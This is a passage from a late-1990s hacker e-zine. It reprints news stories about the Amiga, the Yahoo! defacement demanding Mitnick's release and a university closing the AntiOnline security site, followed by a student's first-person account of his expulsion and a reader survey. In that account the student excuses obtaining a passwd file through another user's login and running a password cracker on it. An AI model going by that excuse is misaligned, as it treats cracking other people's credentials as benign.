Byte, is back again. Developed by Hi-Toro, then sold to Commodore, the
computer hit the streets in late 1985 and met its first public demise with
the death of Commodore in 1994.
Though the system disappeared from the mainstream, Amiga owners have kept the
machine alive in a quasi-underground market. Meanwhile, the German clone
manufacturer that bought the OS promptly went bankrupt, and after two deals
fell through sold the technology to Gateway 2000 last March. When Amiga
Inc.'s Darreck Lisle subsequently began popping up in several user groups,
predictions of another "second coming" including PDAs and set-top boxes based
on the venerable OS spread quickly around the Net. Gateway did not respond to
the buzz, choosing to keep quiet until DevCon, a gathering of professional
developers at the Midwest Amiga Exposition in November. Even if this revival
fails, the faithful know the Amiga still has several lives to go.
This article originally appeared in the December issue of Wired magazine.
To subscribe to Wired magazine, send email to subscriptions@wired.com, or
call +1 (800) SO WIRED.
(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________
Hackers break into Yahoo!, call for release of Mitnick
December 9, 1997
NEW YORK (AP) -- Hackers broke into Yahoo!, the Internet's most popular
site, demanding the release of an imprisoned comrade and threatening to
unleash a crippling computer virus if he is not freed.
Computer security experts were skeptical of the hackers' claim that they had
implanted such a virus.
The hackers, calling themselves PANTS/HAGIS, got into Yahoo!'s World Wide Web
site at about 10 p.m. Monday, leaving a digital ransom note.
"For the past month, anyone who has viewed Yahoo's page & used their search
engine, now has a logic bomb/worm implanted deep within their computer," it
read. "On Christmas Day, 1998, the logic bomb part of this 'virus' will
become active, wreaking havoc upon the entire planet's networks.
"The virus can be stopped. But not by mortals."
The note said an "antidote" program will be made available if hacker Kevin
Mitnick is released. Mitnick was indicted last year on charges involving a
multimillion-dollar crime wave in cyberspace.
Diane Hunt, a spokeswoman for the company, said the message was up for only
10 to 15 minutes and a few thousand people saw it.
"We immediately took action to see the extent of the damage and moved to
correct it," she said. "And about that virus? There is, in fact, no virus."
Yahoo! is a computer directory widely used for searching the Internet. The
note appeared briefly in place of the Yahoo! home page, preventing people
online from using the search engine, which got 17.2 million visits in
October.
Jonathan Wheat, manager of the Anti-Virus Lab at the National Computer
Security Association, said it is at least theoretically possible to exploit
security flaws on the Internet and implant such a virus. But he said he
doubts this group of hackers -- already known to security experts -- pulled
it off.
"That's pretty much ridiculous," agreed Jamonn Campbell, an information
security analyst at the association.
Wheat said there was little reason to be concerned that the popular Web site
was hacked.
"A lot of Web sites get hacked constantly," he said. He said that while
Yahoo! is a high-profile site and should be expected to have better security
than most, "no site is completely hack-proof."
(c)1997 The Associated Press.
_____________________________________________________________
University Kills Students' Security Site
by Steve Silberman
Two University of Pittsburgh computer-science majors have been abruptly
barred from accessing the Net by campus officials, physically banned from all
the college's computing labs, ordered not to contact the staff member who
shut down their access, and threatened with expulsion.
Their offense? Building a free online resource for those on the
cutting edge of computer-security issues, the students say.
Last Friday, freshmen John Vranesevich and Rob Dailey found that the
Ethernet connection in their dorm room had been disabled. Assuming that their
site, AntiOnline, was being subjected to a denial-of-service attack from some
hacker targeting a site devoted to protecting others from malicious hacks,
the two began the usual drill of reinstalling TCP/IP software and "pinging
out" to verify their connection to the Net at large.
After working nearly all night, they found a message on their voice
mail from Lee Bannister, coordinator of residential computer services at the
university. Bannister's message: Their Ethernet access had been terminated
for violations of Pitt's code of responsibility for use of on-campus
computing resources.
Bannister also said AntiOnline violated rules prohibiting use of
campus facilities "for purposes other than research or instructional
purposes." The code also prohibits use of campus server space and bandwidth
"for commercial purposes or commercial gain," and bans hacking or any
activity that "interferes with the operation of the university's technical
resources by deliberately attempting to degrade or disrupt resource
performance, security, or administrative operation."
Vranesevich and Dailey assert that research and instruction were the
very things they were offering at AntiOnline, which Vranesevich launched when
he was in 10th grade. They also point out that AntiOnline was completely
non-commercial, with no fees, no ads, and no banners. Content was closely
monitored, Vranesevich says, to prevent posting of inappropriate materials
such as porn or "warez" (which can include pirated software or cracking
programs). To those interested in computer-security issues, the site offered
free Net access, email, and space on Vranesevich's server, Dailey said, in
hopes that even the uninitiated could learn from the experts.
"It was educational," Dailey said, "so that even people who were new
to all this could learn to protect themselves."
AntiOnline was a crucial resource for Net security news, said
"RLoxley," who operates the "hackphreak" channel on IRC and is the webmaster
of another hackproofing resource, X-Treme. "If you wanted to know what the
latest exploit [operating-system defect] was, and you wanted to patch it, you
went to that site - bottom line," he said.
Vranesevich claimed that the hacker assaults on AntiOnline - which he
admitted numbered in the "hundreds" - were no threat to the campus computing
system as a whole. "They were smart attacks" aimed specifically at his site,
"nothing that would degrade a network this size," Vranesevich explained. He
also noted the campus network is heavily firewalled.
AntiOnline was one of the first sites to examine a security hole in
the Windows operating system that surfaced in Spain as "Muerte" - ported into
English as the infamous WinNuke bug. Vranesevich was inspired to create a
site devoted to security issues, he said, when a bank of NeXT computers at
his high school in Beaver, Pennsylvania, was used as a telnet "bounce point"
to gain access to a protected computer at NASA.
While still a sophomore in high school, Vranesevich and a friend
negotiated with the Beaver Chamber of Commerce to, as he puts it, "get the
whole town online." The two spun out Web pages for local merchants - netting
themselves US$3,000 each for a summer's work - and schmoozed the town library
and the Beaver Area School District into installing free machines in the
library and free dialup access to the Net for local residents. By the time
Vranesevich got AntiOnline up and running in his tower room at the
University of Pittsburgh, he said, it was a very popular site.
On Tuesday, Vranesevich and Dailey found an ISP willing to host a
page about their plight, and the two posted Bannister's phone number and
email address on the page, and on IRC, with a plea for statements of support.
Later that day, their email and shell accounts were shut down, their
dialup access to the Net was cut off, and the two were informed that they
would be subject to more serious charges, to be specified at a later date. On
Thursday morning, they received a "no-contact order" from the assistant
vice-chancellor for student affairs, forbidding them from communicating with
Bannister by email or phone, even "through any intermediary, including
users of AntiOnline.com or other Internet users at large, or similar types of
association." Should any such contact occur, the letter warned, the freshmen
would be "subject to disciplinary sanctions up to and including dismissal
from the university."
"They expect us to tell anyone who's ever been on AntiOnline to not
email him," Vranesevich said, "when we have no access to the Internet
whatsoever."
Bannister refused to talk to the press, but university director of
communications Ken Service said that "it was felt that the use of the site
was in violation of the policy" the students signed at the beginning of the
semester. Service declined to discuss the details of the case, citing student
confidentiality. But as to the further charges, Service said "the kindliest
version of it is that they seemed to have been encouraging harassment" of
Bannister by posting his email and phone number on the Net.
The case will go to the campus judicial board this afternoon. (11/21/97)
(c)1993-97 Wired Ventures, Inc.
_____________________________________________________________
Deprave
Freshman at XXXXXX University
Texas
Early September, Renee Moore, dean of student life called me in regarding the
computer system having problems, and it continually going down. She
requested a meeting between me, her, and Matin, on of the heads of the
computer systems department. They informed me that my login had been used
during the incident as well as a couple of other peoples'. I reminded them
that I had constantly requested that my account be fixed because I was never
able to log in. Through visits, in which I did sign in to the lab, I talked
to deskworkers as well as the heads of Information Systems, requesting
information regarding my account. I also had electronic communication with
them through email. I had sent email through Tommy Newman's account with
his permission. They never fixed it, so I went ahead and temporarily used
my parents America Online. I volunteered my computer for their perusal to
verify that my system was not used. They accepted and proceeded to search
through it. Nothing was found in their search, and this was recorded in the "case's" record. After that meeting, Renee Moore requested
another meeting so that we could discuss the findings and the facts. At this
meeting, she disclosed to me that they had found no direct evidence that it
had been me doing the damage. To the question, "Is this over with?", she
responded, "Yes."
The next incident was at my school's computer lab. On this occasion,
I had gone into the lab in order to visit a friend of mine named
Anthony. The only time I touched the computer was to briefly look at
a site that he showed me at Hotmail, plus a few other miscellaneous
sites that I don't remember. He saw that I never once logged into the
computer system and can verify that. After that, two student workers,
not staff, came in and asked for my identification, saying,
"Cmon Colin, we know what you were doing.......we had someone outside
the building looking in from the window that had seen you doing
something." When I asked them, "What is is it that you think that I
was doing, they responded, "We don't know yet, but you know what you
were doing, and if any damage was done, we will contact you." I said,
"fine. I wasn't doing anything, and you all know that if you were
watching me." They told Renee Moore that they had to kick me out of
the computer lab. The fact is, and can be verified by witnesses,
that I left approximately 15-20 minutes later on my own, and that I was never
asked to leave.
They never attempted to contact me. Instead, on Friday, December 12,
1996, three FBI agents, Mathew Grief (another dean of student life)
and one of the people in Information Systems came into my room. The
FBI agents had a search warrant that gave them the right to
confiscate my computer and everything having to do with it. They
never charged me with anything, and never read me my rights. After
about 20 minutes of going through my personal belongings, they told
me that they were going to ask me some questions. Their first
question regarded the September incident. At that point, I did not
answer and told them that I would prefer to have an attorney or some
form of representation present. They said that that was fine and
continued searching. The ordeal ended with their leaving with my
possessions, stating that they would be in contact with me.
The final exchange took place in the office of Renee Moore. This
invoved her informing me that they had expelled me. When I asked her
why the FBI had been called, she referred to the incident with the
computer lab. She had been told that I was asked to leave, when I
had not been. She told my parents on the phone that Jack had been
called, which was true, he had been, but that he had been called and
came and had talked to me. The computer lab people are having a
problem sticking to one story and are telling different people
different things.
Things on my computer:
passwd file: I got this from April, one of the desk workers, through her
login and password when she said that she had been having problems logging
into her email account.
cracked passwords: I ran a cracker on these in order to help her. The cracker
does other accounts too by itself. I did not target any of them.
source code: I had this for my own reference. They cannot be used from
Windows 95. I do not have a LINUX partition, so these cannot be used locally.
I had my programming books confiscated. I had been trying to learn some
programming.
[Reader Survey..........................................................Staff]
[This survey is designed to help us better suit our magazine to the reader,
or we may just be trying to get a good laugh, but we haven't decided yet.]
Nick:
M/F:
Age:
Occupation/grade:
City:
State/Province:
Zip Code:
Country:
Area Code:
Why do you read The HAVOC Technical Journal?
Where did you get this issue?
Are you a subscriber to THTJ?
What other zines do you read on a regular basis?
What would you like to see in future issue of THTJ?
What would you add or subtract from THTJ's format and articles?
On a scale of 1-10 ( 1 being lowest, 10 being highest), how would you rate
The HAVOC Technical Journal?
Any extra comments?
Please send all replies to scud@thtj.com
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: [ ] Do not check this box! ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
For office use only:
[ ]D [ ]X [ ]W [ ]Y [ ]0 [ ]1 [ ]0 [ ]1
(don't ask, we don't have a clue what this is for)
[Fin....................................................................scud_]
Well, once again thank you for reading this fine issue of thtj. Tune in next
month, same bat time, same bat channel! While you are waiting to read the
next issue, why dont you send us some mail, or fill out the reader survey, or
better yet, write an article for thtj?
scud_ <scud@thtj.com>